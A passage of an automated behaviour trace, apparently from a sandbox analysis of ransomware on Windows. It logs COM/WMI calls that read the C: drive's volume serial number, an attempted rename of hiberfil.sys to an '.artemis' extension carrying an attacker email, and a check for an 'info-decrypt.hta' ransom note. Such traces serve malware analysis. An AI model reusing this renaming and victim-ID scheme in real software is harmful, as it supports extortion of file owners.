[7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x641f030 | out: ppv=0x641f030*=0x6736fb8) returned 0x0 [0165.705] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6736fb8, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x641f0c4 | out: ppNamespace=0x641f0c4*=0x6730d0c) returned 0x0 [0167.324] WbemLocator:IUnknown:QueryInterface (in: This=0x6730d0c, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641ef60 | out: ppvObject=0x641ef60*=0x781634) returned 0x0 [0167.324] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x781634, pProxy=0x6730d0c, pAuthnSvc=0x641efb0, pAuthzSvc=0x641efac, pServerPrincName=0x641efa4, pAuthnLevel=0x641efa8, pImpLevel=0x641ef98, pAuthInfo=0x641ef9c, pCapabilites=0x641efa0 | out: pAuthnSvc=0x641efb0*=0xa, pAuthzSvc=0x641efac*=0x0, pServerPrincName=0x641efa4, pAuthnLevel=0x641efa8*=0x6, pImpLevel=0x641ef98*=0x2, pAuthInfo=0x641ef9c, pCapabilites=0x641efa0*=0x1) returned 0x0 [0167.324] WbemLocator:IUnknown:Release (This=0x781634) returned 0x1 [0167.324] WbemLocator:IUnknown:QueryInterface (in: This=0x6730d0c, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641ef54 | out: ppvObject=0x641ef54*=0x781654) returned 0x0 [0167.324] WbemLocator:IUnknown:QueryInterface (in: This=0x6730d0c, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641ef50 | out: ppvObject=0x641ef50*=0x781634) returned 0x0 [0167.324] WbemLocator:IClientSecurity:SetBlanket (This=0x781634, pProxy=0x6730d0c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0167.325] WbemLocator:IUnknown:Release (This=0x781634) returned 0x2 [0167.325] WbemLocator:IUnknown:Release (This=0x781654) returned 0x1 [0167.325] CoTaskMemFree (pv=0x77e0e8) [0167.325] WbemLocator:IUnknown:Release (This=0x6736fb8) returned 0x0 [0167.325] WbemLocator:IUnknown:QueryInterface (in: This=0x6730d0c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641eb50 | out: ppvObject=0x641eb50*=0x781654) returned 0x0 [0167.325] WbemLocator:IUnknown:QueryInterface (in: This=0x781654, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x641eb0c | out: ppvObject=0x641eb0c*=0x0) returned 0x80004002 [0167.352] WbemLocator:IUnknown:QueryInterface (in: This=0x781654, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x641e92c | out: ppvObject=0x641e92c*=0x0) returned 0x80004002 [0167.353] WbemLocator:IUnknown:AddRef (This=0x781654) returned 0x3 [0167.353] WbemLocator:IUnknown:QueryInterface (in: This=0x781654, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x641e46c | out: ppvObject=0x641e46c*=0x0) returned 0x80004002 [0167.353] WbemLocator:IUnknown:QueryInterface (in: This=0x781654, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x641e41c | out: ppvObject=0x641e41c*=0x0) returned 0x80004002 [0167.354] WbemLocator:IUnknown:QueryInterface (in: This=0x781654, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641e428 | out: ppvObject=0x641e428*=0x7815b4) returned 0x0 [0167.354] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x7815b4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x641e430 | out: pCid=0x641e430*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0167.354] WbemLocator:IUnknown:Release (This=0x7815b4) returned 0x3 [0167.354] CoGetContextToken (in: pToken=0x641e488 | out: pToken=0x641e488) returned 0x0 [0167.354] CoGetContextToken (in: pToken=0x641e890 | out: pToken=0x641e890) returned 0x0 [0167.354] WbemLocator:IUnknown:QueryInterface (in: This=0x781654, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641e920 | out: ppvObject=0x641e920*=0x78163c) returned 0x0 [0167.354] WbemLocator:IRpcOptions:Query (in: This=0x78163c, pPrx=0x781654, dwProperty=2, pdwValue=0x641e948 | out: pdwValue=0x641e948) returned 0x80004002 [0167.354] WbemLocator:IUnknown:Release (This=0x78163c) returned 0x3 [0167.354] WbemLocator:IUnknown:Release (This=0x781654) returned 0x2 [0167.354] CoGetContextToken (in: pToken=0x641ee60 | out: pToken=0x641ee60) returned 0x0 [0167.354] CoGetContextToken (in: pToken=0x641edc0 | out: pToken=0x641edc0) returned 0x0 [0167.355] WbemLocator:IUnknown:QueryInterface (in: This=0x781654, riid=0x641ee90*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x641ee8c | out: ppvObject=0x641ee8c*=0x6730d0c) returned 0x0 [0167.355] WbemLocator:IUnknown:AddRef (This=0x6730d0c) returned 0x4 [0167.355] WbemLocator:IUnknown:Release (This=0x6730d0c) returned 0x3 [0167.355] WbemLocator:IUnknown:Release (This=0x6730d0c) returned 0x2 [0167.355] SysStringLen (param_1=0x0) returned 0x0 [0167.355] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738690, puCount=0x641f228 | out: puCount=0x641f228*=0x0) returned 0x0 [0167.355] WbemDefPath:IWbemPath:GetText (in: This=0x6738690, lFlags=2, puBuffLength=0x641f224*=0x0, pszText=0x0 | out: puBuffLength=0x641f224*=0x20, pszText=0x0) returned 0x0 [0167.355] WbemDefPath:IWbemPath:GetText (in: This=0x6738690, lFlags=2, puBuffLength=0x641f224*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x641f224*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0167.355] CoGetContextToken (in: pToken=0x641ee98 | out: pToken=0x641ee98) returned 0x0 [0167.355] WbemLocator:IUnknown:AddRef (This=0x781654) returned 0x3 [0167.355] WbemLocator:IUnknown:QueryInterface (in: This=0x781654, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641ed2c | out: ppvObject=0x641ed2c*=0x781654) returned 0x0 [0167.355] WbemLocator:IUnknown:Release (This=0x781654) returned 0x3 [0167.355] WbemLocator:IUnknown:Release (This=0x781654) returned 0x2 [0167.355] WbemDefPath:IWbemPath:GetText (in: This=0x6738690, lFlags=2, puBuffLength=0x641f22c*=0x0, pszText=0x0 | out: puBuffLength=0x641f22c*=0x20, pszText=0x0) returned 0x0 [0167.355] WbemDefPath:IWbemPath:GetText (in: This=0x6738690, lFlags=2, puBuffLength=0x641f22c*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x641f22c*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0167.356] IWbemServices:GetObject (in: This=0x6730d0c, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x641f1e0*=0x0, ppCallResult=0x0 | out: ppObject=0x641f1e0*=0x673b468, ppCallResult=0x0) returned 0x0 [0167.516] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738700, puCount=0x641f1e0 | out: puCount=0x641f1e0*=0x2) returned 0x0 [0167.516] WbemDefPath:IWbemPath:GetText (in: This=0x6738700, lFlags=4, puBuffLength=0x641f1dc*=0x0, pszText=0x0 | out: puBuffLength=0x641f1dc*=0xf, pszText=0x0) returned 0x0 [0167.516] WbemDefPath:IWbemPath:GetText (in: This=0x6738700, lFlags=4, puBuffLength=0x641f1dc*=0xf, pszText="00000000000000" | out: puBuffLength=0x641f1dc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0167.516] IWbemClassObject:Get (in: This=0x673b468, wszName="VolumeSerialNumber", lFlags=0, pVal=0x641f1dc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x37fbbc4*=0, plFlavor=0x37fbbc8*=0 | out: pVal=0x641f1dc*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x37fbbc4*=8, plFlavor=0x37fbbc8*=0) returned 0x0 [0167.516] SysStringByteLen (bstr="9C354B42") returned 0x10 [0167.516] SysStringByteLen (bstr="9C354B42") returned 0x10 [0167.517] IWbemClassObject:Get (in: This=0x673b468, wszName="VolumeSerialNumber", lFlags=0, pVal=0x641f1e4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x37fbbc4*=8, plFlavor=0x37fbbc8*=0 | out: pVal=0x641f1e4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x37fbbc4*=8, plFlavor=0x37fbbc8*=0) returned 0x0 [0167.517] SysStringByteLen (bstr="9C354B42") returned 0x10 [0167.517] SysStringByteLen (bstr="9C354B42") returned 0x10 [0167.517] GetFullPathNameW (in: lpFileName="C:\\hiberfil.sys", nBufferLength=0x105, lpBuffer=0x641ede4, lpFilePart=0x0 | out: lpBuffer="C:\\hiberfil.sys", lpFilePart=0x0) returned 0xf [0167.517] GetFullPathNameW (in: lpFileName="C:\\hiberfil.sys.id-9C354B42.[khalate@tutanota.com].artemis", nBufferLength=0x105, lpBuffer=0x641ede4, lpFilePart=0x0 | out: lpBuffer="C:\\hiberfil.sys.id-9C354B42.[khalate@tutanota.com].artemis", lpFilePart=0x0) returned 0x3a [0167.517] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x641f244) returned 1 [0167.517] GetFileAttributesExW (in: lpFileName="C:\\hiberfil.sys" (normalized: "c:\\hiberfil.sys"), fInfoLevelId=0x0, lpFileInformation=0x641f2c0 | out: lpFileInformation=0x641f2c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0167.517] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x641f240) returned 1 [0167.517] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x641f1e0) returned 1 [0167.517] FindFirstFileW (in: lpFileName="C:\\hiberfil.sys", lpFindFileData=0x641ef20 | out: lpFindFileData=0x641ef20*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xae99ef60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0x0, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 0x77b3f0 [0167.518] FindClose (in: hFindFile=0x77b3f0 | out: hFindFile=0x77b3f0) returned 1 [0167.518] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x641f1dc) returned 1 [0167.518] MoveFileW (lpExistingFileName="C:\\hiberfil.sys" (normalized: "c:\\hiberfil.sys"), lpNewFileName="C:\\hiberfil.sys.id-9C354B42.[khalate@tutanota.com].artemis" (normalized: "c:\\hiberfil.sys.id-9c354b42.[khalate@tutanota.com].artemis")) returned 0 [0167.520] GetFullPathNameW (in: lpFileName="C:\\pagefile.sys", nBufferLength=0x105, lpBuffer=0x641ee88, lpFilePart=0x0 | out: lpBuffer="C:\\pagefile.sys", lpFilePart=0x0) returned 0xf [0167.520] GetFullPathNameW (in: lpFileName="C:\\pagefile.sys", nBufferLength=0x105, lpBuffer=0x641ee80, lpFilePart=0x0 | out: lpBuffer="C:\\pagefile.sys", lpFilePart=0x0) returned 0xf [0167.520] GetFullPathNameW (in: lpFileName="C:\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x641ee88, lpFilePart=0x0 | out: lpBuffer="C:\\info-decrypt.hta", lpFilePart=0x0) returned 0x13 [0167.520] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x641f2e8) returned 1 [0167.520] GetFileAttributesExW (in: lpFileName="C:\\info-decrypt.hta" (normalized: "c:\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x641f364 | out: lpFileInformation=0x641f364*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe1f09e0, ftCreationTime.dwHighDateTime=0x1d6a20a, ftLastAccessTime.dwLowDateTime=0xfe1f09e0, ftLastAccessTime.dwHighDateTime=0x1d6a20a, ftLastWriteTime.dwLowDateTime=0xfe1f09e0, ftLastWriteTime.dwHighDateTime=0x1d6a20a, nFileSizeHigh=0x0, nFileSizeLow=0x1557)) returned 1 [0167.520] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x641f2e4) returned 1 [0167.520] GetFullPathNameW (in: lpFileName="C:\\pagefile.sys", nBufferLength=0x105, lpBuffer=0x641ee04, lpFilePart=0x0 | out: lpBuffer="C:\\pagefile.sys", lpFilePart=0x0) returned 0xf [0167.520] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x641f2b0) returned 1 [0167.520] GetFileAttributesExW (in: lpFileName="C:\\pagefile.sys" (normalized: "c:\\pagefile.sys"), fInfoLevelId=0x0, lpFileInformation=0x37fc30c | out: lpFileInformation=0x37fc30c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0167.521] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x641f2ac) returned 1 [0167.521] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x641f24c) returned 1 [0167.521] FindFirstFileW (in: lpFileName="C:\\pagefile.sys", lpFindFileData=0x641ef8c | out: lpFindFileData=0x641ef8c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xf456e360, ftLastWriteTime.dwHighDateTime=0x1d6a20a, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0x0, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 0x77b3f0 [0167.521] FindClose (in: hFindFile=0x77b3f0 | out: hFindFile=0x77b3f0) returned 1 [0167.521] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x641f248) returned 1 [0173.618] GetFullPathNameW (in: lpFileName="C:\\pagefile.sys", nBufferLength=0x105, lpBuffer=0x641ed24, lpFilePart=0x0 | out: lpBuffer="C:\\pagefile.sys", lpFilePart=0x0) returned 0xf [0173.618] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x641f218) returned 1 [0173.618] CreateFileW (lpFileName="C:\\pagefile.sys" (normalized: "c:\\pagefile.sys"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0173.619] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x641e050) returned 1 [0173.619] CoTaskMemAlloc (cb=0x20c) returned 0x98257d0 [0173.619] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x98257d0 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0173.619] CoTaskMemFree (pv=0x98257d0) [0173.619] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x641ecc4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0173.619] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x641f20c | out: ppv=0x641f20c*=0x72015c) returned 0x0 [0173.620] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x641f204 | out: pAptType=0x641f204*=1) returned 0x0 [0173.620] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x641f208 | out: ppvObject=0x641f208*=0x0) returned 0x80004002 [0173.620] IUnknown:Release (This=0x72015c) returned 0x1 [0173.620] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x641eb78 | out: ppv=0x641eb78*=0x67373e0) returned 0x0 [0173.621] WbemDefPath:IUnknown:QueryInterface (in: This=0x67373e0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x641ed90 | out: ppvObject=0x641ed90*=0x0) returned 0x80004002 [0173.621] WbemDefPath:IClassFactory:CreateInstance (in: This=0x67373e0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641eda4 | out: ppvObject=0x641eda4*=0x6733f80) returned 0x0 [0173.621] WbemDefPath:IUnknown:Release (This=0x67373e0) returned 0x0 [0173.621] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733f80, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641e9c4 | out: ppvObject=0x641e9c4*=0x6733f80) returned 0x0 [0173.621] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733f80, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x641e980 | out: ppvObject=0x641e980*=0x0) returned 0x80004002 [0173.621] WbemDefPath:IUnknown:AddRef (This=0x6733f80) returned 0x3 [0173.621] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733f80, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x641e2dc | out: ppvObject=0x641e2dc*=0x0) returned 0x80004002 [0173.621] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733f80, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x641e28c | out: ppvObject=0x641e28c*=0x0) returned 0x80004002 [0173.621] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733f80, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641e298 | out: ppvObject=0x641e298*=0x77dc88) returned 0x0 [0173.621] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77dc88, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x641e2a0 | out: pCid=0x641e2a0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0173.621] WbemDefPath:IUnknown:Release (This=0x77dc88) returned 0x3 [0173.621] CoGetContextToken (in: pToken=0x641e2f8 | out: pToken=0x641e2f8) returned 0x0 [0173.621] CoGetContextToken (in: pToken=0x641e700 | out: pToken=0x641e700) returned 0x0 [0173.621] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733f80, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641e790 | out: ppvObject=0x641e790*=0x0) returned 0x80004002 [0173.621] WbemDefPath:IUnknown:Release (This=0x6733f80) returned 0x2 [0173.621] WbemDefPath:IUnknown:Release (This=0x6733f80) returned 0x1 [0173.621] CoGetContextToken (in: pToken=0x641f088 | out: pToken=0x641f088) returned 0x0 [0173.621] CoGetContextToken (in: pToken=0x641efe8 | out: pToken=0x641efe8) returned 0x0 [0173.621] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733f80, riid=0x641f0b8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x641f0b4 | out: ppvObject=0x641f0b4*=0x6733f80) returned 0x0 [0173.621] WbemDefPath:IUnknown:AddRef (This=0x6733f80) returned 0x3 [0173.621] WbemDefPath:IUnknown:Release (This=0x6733f80) returned 0x2 [0173.622] WbemDefPath:IWbemPath:SetText (This=0x6733f80, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0173.622] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6733f80, puCount=0x641f238 | out: puCount=0x641f238*=0x0) returned 0x0 [0173.622] WbemDefPath:IWbemPath:GetText (in: This=0x6733f80, lFlags=2, puBuffLength=0x641f234*=0x0, pszText=0x0 | out: puBuffLength=0x641f234*=0x20, pszText=0x0) returned 0x0 [0173.622] WbemDefPath:IWbemPath:GetText (in: This=0x6733f80, lFlags=2, puBuffLength=0x641f234*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x641f234*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0173.622] WbemDefPath:IWbemPath:GetInfo (in: This=0x6733f80, uRequestedInfo=0x0, puResponse=0x641f240 | out: puResponse=0x641f240*=0xc19) returned 0x0 [0173.622] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6733f80, puCount=0x641f238 | out: puCount=0x641f238*=0x0) returned 0x0 [0173.622] WbemDefPath:IWbemPath:GetInfo (in: This=0x6733f80, uRequestedInfo=0x0, puResponse=0x641f240 | out: puResponse=0x641f240*=0xc19) returned 0x0 [0173.622] WbemDefPath:IWbemPath:GetInfo (in: This=0x6733f80, uRequestedInfo=0x0, puResponse=0x641f240 | out: puResponse=0x641f240*=0xc19) returned 0x0 [0173.622] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6733f80, puCount=0x641f1b8 | out: puCount=0x641f1b8*=0x0) returned 0x0 [0173.622] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x641f1a4 | out: puCount=0x641f1a4*=0x2) returned 0x0 [0173.622] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x641f1a0*=0x0, pszText=0x0 | out: puBuffLength=0x641f1a0*=0xf, pszText=0x0) returned 0x0 [0173.622] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x641f1a0*=0xf, pszText="00000000000000" | out: puBuffLength=0x641f1a0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0173.622] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x641f154 | out: ppv=0x641f154*=0x72015c) returned 0x0 [0173.622] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x641f14c | out: pAptType=0x641f14c*=1) returned 0x0 [0173.622] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x641f150 | out: ppvObject=0x641f150*=0x0) returned 0x80004002 [0173.622] IUnknown:Release (This=0x72015c) returned 0x1 [0173.623] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x641eac0 | out: ppv=0x641eac0*=0x6737400) returned 0x0 [0173.623] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737400, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x641ecd8 | out: ppvObject=0x641ecd8*=0x0) returned 0x80004002 [0173.623] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6737400, 